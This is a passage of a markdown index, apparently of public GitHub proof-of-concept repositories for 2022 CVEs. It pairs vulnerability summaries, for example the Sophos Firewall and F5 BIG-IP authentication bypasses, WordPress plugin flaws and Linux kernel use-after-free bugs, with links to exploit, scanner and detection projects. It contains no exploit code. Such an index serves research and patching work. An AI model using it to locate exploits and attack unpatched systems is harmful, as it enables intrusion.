[r0lh/kygocera](https://github.com/r0lh/kygocera) + +### CVE-2022-1040 (2022-03-25) + +An authentication bypass vulnerability in the User Portal and Webadmin allows a remote attacker to execute code in Sophos Firewall version v18.5 MR3 and older. + + +- [killvxk/CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040) +- [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability) +- [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040) +- [jackson5sec/CVE-2022-1040](https://github.com/jackson5sec/CVE-2022-1040) +- [michealadams30/CVE-2022-1040](https://github.com/michealadams30/CVE-2022-1040) +- [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040) +- [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040) + +### CVE-2022-1051 (2022-05-16) + +The WPQA Builder Plugin WordPress plugin before 5.2, used as a companion plugin for the Discy and Himer , does not sanitise and escape the city, phone or profile credentials fields when outputting it in the profile page, allowing any authenticated user to perform Cross-Site Scripting attacks. + + +- [V35HR4J/CVE-2022-1051](https://github.com/V35HR4J/CVE-2022-1051) + +### CVE-2022-1068 (2022-04-01) + +Modbus Tools Modbus Slave (versions 7.4.2 and prior) is vulnerable to a stack-based buffer overflow in the registration field. This may cause the program to crash when a long character string is used. + + +- [webraybtl/CVE-2022-1068](https://github.com/webraybtl/CVE-2022-1068) + +### CVE-2022-1077 (2022-03-29) + +A vulnerability was found in TEM FLEX-1080 and FLEX-1085 1.6.0. It has been declared as problematic. This vulnerability log.cgi of the component Log Handler. A direct request leads to information disclosure of hardware information. The attack can be initiated remotely and does not require any form of authentication. + + +- [brosck/CVE-2022-1077](https://github.com/brosck/CVE-2022-1077) + +### CVE-2022-1096 (2022-07-22) + +Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper](https://github.com/Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper) + +### CVE-2022-1119 (2022-04-19) + +The Simple File List WordPress plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded, in versions up to and including 3.2.7. + + +- [z92g/CVE-2022-1119](https://github.com/z92g/CVE-2022-1119) + +### CVE-2022-1162 (2022-04-04) + +A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts + + +- [Greenwolf/CVE-2022-1162](https://github.com/Greenwolf/CVE-2022-1162) +- [ipsBruno/CVE-2022-1162](https://github.com/ipsBruno/CVE-2022-1162) + +### CVE-2022-1175 (2022-04-04) + +Improper neutralization of user input in GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2 allowed an attacker to exploit XSS by injecting HTML in notes. + + +- [Greenwolf/CVE-2022-1175](https://github.com/Greenwolf/CVE-2022-1175) + +### CVE-2022-1203 (2022-05-30) + +The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options + + +- [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203) + +### CVE-2022-1227 (2022-04-29) + +A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service. + + +- [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit) + +### CVE-2022-1292 (2022-05-03) + +The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd). + + +- [li8u99/CVE-2022-1292](https://github.com/li8u99/CVE-2022-1292) +- [alcaparra/CVE-2022-1292](https://github.com/alcaparra/CVE-2022-1292) +- [rama291041610/CVE-2022-1292](https://github.com/rama291041610/CVE-2022-1292) +- [greek0x0/CVE-2022-1292](https://github.com/greek0x0/CVE-2022-1292) +- [und3sc0n0c1d0/CVE-2022-1292](https://github.com/und3sc0n0c1d0/CVE-2022-1292) + +### CVE-2022-1329 (2022-04-19) + +The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~/core/app/modules/onboarding/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to obtain remote code execution, in versions 3.6.0 to 3.6.2. + + +- [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit) +- [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329) +- [Grazee/CVE-2022-1329-WordPress-Elementor-RCE](https://github.com/Grazee/CVE-2022-1329-WordPress-Elementor-RCE) +- [dexit/CVE-2022-1329](https://github.com/dexit/CVE-2022-1329) +- [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329) +- [AgustinESI/CVE-2022-1329](https://github.com/AgustinESI/CVE-2022-1329) + +### CVE-2022-1364 (2022-07-26) + +Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [A1Lin/cve-2022-1364](https://github.com/A1Lin/cve-2022-1364) + +### CVE-2022-1386 (2022-05-16) + +The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures. + + +- [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386) +- [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker) +- [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability) +- [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386) + +### CVE-2022-1388 (2022-05-05) + +On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated + + +- [numanturle/CVE-2022-1388](https://github.com/numanturle/CVE-2022-1388) +- [jheeree/CVE-2022-1388-checker](https://github.com/jheeree/CVE-2022-1388-checker) +- [MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed](https://github.com/MrCl0wnLab/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed) +- [Osyanina/westone-CVE-2022-1388-scanner](https://github.com/Osyanina/westone-CVE-2022-1388-scanner) +- [doocop/CVE-2022-1388-EXP](https://github.com/doocop/CVE-2022-1388-EXP) +- [blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit](https://github.com/blind-intruder/CVE-2022-1388-RCE-checker-and-POC-Exploit) +- [Hudi233/CVE-2022-1388](https://github.com/Hudi233/CVE-2022-1388) +- [sherlocksecurity/CVE-2022-1388-Exploit-POC](https://github.com/sherlocksecurity/CVE-2022-1388-Exploit-POC) +- [yukar1z0e/CVE-2022-1388](https://github.com/yukar1z0e/CVE-2022-1388) +- [0xf4n9x/CVE-2022-1388](https://github.com/0xf4n9x/CVE-2022-1388) +- [alt3kx/CVE-2022-1388_PoC](https://github.com/alt3kx/CVE-2022-1388_PoC) +- [Vulnmachines/F5-Big-IP-CVE-2022-1388](https://github.com/Vulnmachines/F5-Big-IP-CVE-2022-1388) +- [ZephrFish/F5-CVE-2022-1388-Exploit](https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit) +- [horizon3ai/CVE-2022-1388](https://github.com/horizon3ai/CVE-2022-1388) +- [Al1ex/CVE-2022-1388](https://github.com/Al1ex/CVE-2022-1388) +- [Henry4E36/CVE-2022-1388](https://github.com/Henry4E36/CVE-2022-1388) +- [savior-only/CVE-2022-1388](https://github.com/savior-only/CVE-2022-1388) +- [saucer-man/CVE-2022-1388](https://github.com/saucer-man/CVE-2022-1388) +- [superzerosec/CVE-2022-1388](https://github.com/superzerosec/CVE-2022-1388) +- [Stonzyy/Exploit-F5-CVE-2022-1388](https://github.com/Stonzyy/Exploit-F5-CVE-2022-1388) +- [MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter](https://github.com/MrCl0wnLab/Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter) +- [qusaialhaddad/F5-BigIP-CVE-2022-1388](https://github.com/qusaialhaddad/F5-BigIP-CVE-2022-1388) +- [chesterblue/CVE-2022-1388](https://github.com/chesterblue/CVE-2022-1388) +- [Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388](https://github.com/Angus-Team/F5-BIG-IP-RCE-CVE-2022-1388) +- [LinJacck/CVE-2022-1388-EXP](https://github.com/LinJacck/CVE-2022-1388-EXP) +- [iveresk/cve-2022-1388-1veresk](https://github.com/iveresk/cve-2022-1388-1veresk) +- [shamo0/CVE-2022-1388](https://github.com/shamo0/CVE-2022-1388) +- [vesperp/CVE-2022-1388-F5-BIG-IP](https://github.com/vesperp/CVE-2022-1388-F5-BIG-IP) +- [thatonesecguy/CVE-2022-1388-Exploit](https://github.com/thatonesecguy/CVE-2022-1388-Exploit) +- [bandit92/CVE2022-1388_TestAPI](https://github.com/bandit92/CVE2022-1388_TestAPI) +- [0x7eTeam/CVE-2022-1388-PocExp](https://github.com/0x7eTeam/CVE-2022-1388-PocExp) +- [0xAgun/CVE-2022-1388](https://github.com/0xAgun/CVE-2022-1388) +- [AmirHoseinTangsiriNET/CVE-2022-1388-Scanner](https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner) +- [EvilLizard666/CVE-2022-1388](https://github.com/EvilLizard666/CVE-2022-1388) +- [mr-vill4in/CVE-2022-1388](https://github.com/mr-vill4in/CVE-2022-1388) +- [omnigodz/CVE-2022-1388](https://github.com/omnigodz/CVE-2022-1388) +- [pauloink/CVE-2022-1388](https://github.com/pauloink/CVE-2022-1388) +- [SecTheBit/CVE-2022-1388](https://github.com/SecTheBit/CVE-2022-1388) +- [Zeyad-Azima/CVE-2022-1388](https://github.com/Zeyad-Azima/CVE-2022-1388) +- [justakazh/CVE-2022-1388](https://github.com/justakazh/CVE-2022-1388) +- [PsychoSec2/CVE-2022-1388-POC](https://github.com/PsychoSec2/CVE-2022-1388-POC) +- [iveresk/cve-2022-1388-iveresk-command-shell](https://github.com/iveresk/cve-2022-1388-iveresk-command-shell) +- [Wrin9/CVE-2022-1388](https://github.com/Wrin9/CVE-2022-1388) +- [aancw/CVE-2022-1388-rs](https://github.com/aancw/CVE-2022-1388-rs) +- [west9b/F5-BIG-IP-POC](https://github.com/west9b/F5-BIG-IP-POC) +- [sashka3076/F5-BIG-IP-exploit](https://github.com/sashka3076/F5-BIG-IP-exploit) +- [Chocapikk/CVE-2022-1388](https://github.com/Chocapikk/CVE-2022-1388) +- [li8u99/CVE-2022-1388](https://github.com/li8u99/CVE-2022-1388) +- [electr0lulz/Mass-CVE-2022-1388](https://github.com/electr0lulz/Mass-CVE-2022-1388) +- [Luchoane/CVE-2022-1388_refresh](https://github.com/Luchoane/CVE-2022-1388_refresh) +- [jbharucha05/CVE-2022-1388](https://github.com/jbharucha05/CVE-2022-1388) +- [On-Cyber-War/CVE-2022-1388](https://github.com/On-Cyber-War/CVE-2022-1388) +- [forktheplanet/CVE-2022-1388](https://github.com/forktheplanet/CVE-2022-1388) +- [revanmalang/CVE-2022-1388](https://github.com/revanmalang/CVE-2022-1388) +- [amitlttwo/CVE-2022-1388](https://github.com/amitlttwo/CVE-2022-1388) +- [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388) +- [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388) +- [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388) +- [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue) +- [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study) +- [battleofthebots/refresh](https://github.com/battleofthebots/refresh) +- [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit) +- [nico989/CVE-2022-1388](https://github.com/nico989/CVE-2022-1388) +- [gotr00t0day/CVE-2022-1388](https://github.com/gotr00t0day/CVE-2022-1388) +- [impost0r/CVE-2022-1388](https://github.com/impost0r/CVE-2022-1388) +- [XiaomingX/cve-2022-1388-poc](https://github.com/XiaomingX/cve-2022-1388-poc) + +### CVE-2022-1421 (2022-06-06) + +The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack + + +- [nb1b3k/CVE-2022-1421](https://github.com/nb1b3k/CVE-2022-1421) + +### CVE-2022-1442 (2022-05-10) + +The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3. + + +- [RandomRobbieBF/CVE-2022-1442](https://github.com/RandomRobbieBF/CVE-2022-1442) + +### CVE-2022-1471 (2022-12-01) + +SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.\n + + +- [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC) +- [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc) + +### CVE-2022-1565 (2022-07-18) + +The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. + + +- [phanthibichtram12/CVE-2022-1565](https://github.com/phanthibichtram12/CVE-2022-1565) + +### CVE-2022-1597 (2022-06-06) + +The WPQA Builder WordPress plugin before 5.4, used as a companion for the Discy and Himer , does not sanitise and escape a parameter on its reset password form which makes it possible to perform Reflected Cross-Site Scripting attacks + + +- [V35HR4J/CVE-2022-1597](https://github.com/V35HR4J/CVE-2022-1597) + +### CVE-2022-1598 (2022-06-06) + +The WPQA Builder WordPress plugin before 5.5 which is a companion to the Discy and Himer , lacks authentication in a REST API endpoint, allowing unauthenticated users to discover private questions sent between users on the site. + + +- [V35HR4J/CVE-2022-1598](https://github.com/V35HR4J/CVE-2022-1598) + +### CVE-2022-1609 (2024-01-16) + +The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site. + + +- [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609) +- [0xSojalSec/CVE-2022-1609](https://github.com/0xSojalSec/CVE-2022-1609) +- [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609) +- [w4r3s/cve-2022-1609-exploit](https://github.com/w4r3s/cve-2022-1609-exploit) + +### CVE-2022-1679 (2022-05-16) + +A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679) +- [ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679) + +### CVE-2022-1802 (2022-12-22) + +If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. This vulnerability affects Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1. + + +- [mistymntncop/CVE-2022-1802](https://github.com/mistymntncop/CVE-2022-1802) + +### CVE-2022-1903 (2022-06-27) + +The ARMember WordPress plugin before 3.4.8 is vulnerable to account takeover (even the administrator) due to missing nonce and authorization checks in an AJAX action available to unauthenticated users, allowing them to change the password of arbitrary users by knowing their username + + +- [biulove0x/CVE-2022-1903](https://github.com/biulove0x/CVE-2022-1903) + +### CVE-2022-1966 +- [ASkyeye/CVE-2022-1966](https://github.com/ASkyeye/CVE-2022-1966) + +### CVE-2022-1972 +- [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC) + +### CVE-2022-2078 (2022-06-30) + +A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code. + + +- [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078) + +### CVE-2022-2097 (2022-07-05) + +AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p). + + +- [PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu](https://github.com/PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu) + +### CVE-2022-2109 +- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109) + +### CVE-2022-2185 (2022-07-01) + +A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. + + +- [safe3s/CVE-2022-2185-poc](https://github.com/safe3s/CVE-2022-2185-poc) +- [ESUAdmin/CVE-2022-2185](https://github.com/ESUAdmin/CVE-2022-2185) + +### CVE-2022-2274 (2022-07-01) + +The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue. + + +- [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274) +- [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script) +- [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274) + +### CVE-2022-2333 (2022-09-16) + +If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4.51 application’s context and permissions. + + +- [shirouQwQ/CVE-2022-2333](https://github.com/shirouQwQ/CVE-2022-2333) + +### CVE-2022-2414 (2022-07-29) + +Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + + +- [superhac/CVE-2022-2414-POC](https://github.com/superhac/CVE-2022-2414-POC) +- [amitlttwo/CVE-2022-2414-Proof-Of-Concept](https://github.com/amitlttwo/CVE-2022-2414-Proof-Of-Concept) +- [satyasai1460/CVE-2022-2414](https://github.com/satyasai1460/CVE-2022-2414) +- [geniuszlyy/CVE-2022-2414](https://github.com/geniuszlyy/CVE-2022-2414) + +### CVE-2022-2466 (2022-08-31) + +It was found that Quarkus 2.10.x does not terminate HTTP requests header context which may lead to unpredictable behavior. + + +- [yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL](https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL) + +### CVE-2022-2546 (2023-02-02) + +The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key + + +- [OpenXP-Research/CVE-2022-2546](https://github.com/OpenXP-Research/CVE-2022-2546) + +### CVE-2022-2586 (2024-01-08) + +It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted. + + +- [aels/CVE-2022-2586-LPE](https://github.com/aels/CVE-2022-2586-LPE) +- [sniper404ghostxploit/CVE-2022-2586](https://github.com/sniper404ghostxploit/CVE-2022-2586) + +### CVE-2022-2588 (2024-01-08) + +It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0. + + +- [Markakd/CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588) +- [ASkyeye/2022-LPE-UAF](https://github.com/ASkyeye/2022-LPE-UAF) +- [pirenga/2022-LPE-UAF](https://github.com/pirenga/2022-LPE-UAF) +- [konoha279/2022-LPE-UAF](https://github.com/konoha279/2022-LPE-UAF) +- [snackbauer/CVE-2022-2588](https://github.com/snackbauer/CVE-2022-2588) +- [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588) +- [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588) +- [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588) + +### CVE-2022-2590 (2022-08-31) + +A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system. + + +- [hyeonjun17/CVE-2022-2590-analysis](https://github.com/hyeonjun17/CVE-2022-2590-analysis) + +### CVE-2022-2602 (2024-01-08) + +io_uring UAF, Unix SCM garbage collection + + +- [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602) +- [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit) +- [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study) + +### CVE-2022-2639 (2022-09-01) + +An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [bb33bb/CVE-2022-2639-PipeVersion](https://github.com/bb33bb/CVE-2022-2639-PipeVersion) +- [EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639](https://github.com/EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639) +- [letsr00t/-2022-LOCALROOT-CVE-2022-2639](https://github.com/letsr00t/-2022-LOCALROOT-CVE-2022-2639) +- [devetop/CVE-2022-2639-PipeVersion](https://github.com/devetop/CVE-2022-2639-PipeVersion) + +### CVE-2022-2884 (2022-10-17) + +A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an an authenticated user to achieve remote code execution via the Import from GitHub API endpoint + + +- [m3ssap0/gitlab_rce_cve-2022-2884](https://github.com/m3ssap0/gitlab_rce_cve-2022-2884) + +### CVE-2022-2992 (2022-10-17) + +A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. + + +- [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992) +- [Malwareman007/CVE-2022-2992](https://github.com/Malwareman007/CVE-2022-2992) + +### CVE-2022-3168 +- [irsl/CVE-2022-3168-adb-unexpected-reverse-forwards](https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards) + +### CVE-2022-3172 (2023-11-03) + +A security issue was discovered in kube-apiserver that allows an \naggregated API server to redirect client traffic to any URL. This could\n lead to the client performing unexpected actions as well as forwarding \nthe client's API server credentials to third parties.\n + + +- [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172) + +### CVE-2022-3317 (2022-11-01) + +Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) + + +- [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317) + +### CVE-2022-3328 (2024-01-08) + +Race condition in snap-confine's must_mkdir_and_open_with_perms() + + +- [Mr-xn/CVE-2022-3328](https://github.com/Mr-xn/CVE-2022-3328) + +### CVE-2022-3357 (2022-10-31) + +The Smart Slider 3 WordPress plugin before 3.5.1.11 unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site. + + +- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357) + +### CVE-2022-3368 (2022-10-17) + +A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556. + + +- [Wh04m1001/CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368) +- [byt3n33dl3/CrackAVFee](https://github.com/byt3n33dl3/CrackAVFee) + +### CVE-2022-3464 (2022-10-12) + +A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699. + + +- [GYLQ/CVE-2022-3464](https://github.com/GYLQ/CVE-2022-3464) + +### CVE-2022-3518 (2022-10-15) + +A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability. + + +- [lohith19/CVE-2022-3518](https://github.com/lohith19/CVE-2022-3518) + +### CVE-2022-3546 (2022-10-17) + +A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability. + + +- [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546) + +### CVE-2022-3552 (2022-10-17) + +Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1. + + +- [kabir0x23/CVE-2022-3552](https://github.com/kabir0x23/CVE-2022-3552) + +### CVE-2022-3564 (2022-10-17) + +A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087. + + +- [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564) + +### CVE-2022-3590 (2022-12-14) + +WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden. + + +- [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner) +- [huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner) + +### CVE-2022-3602 (2022-11-01) + +A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of 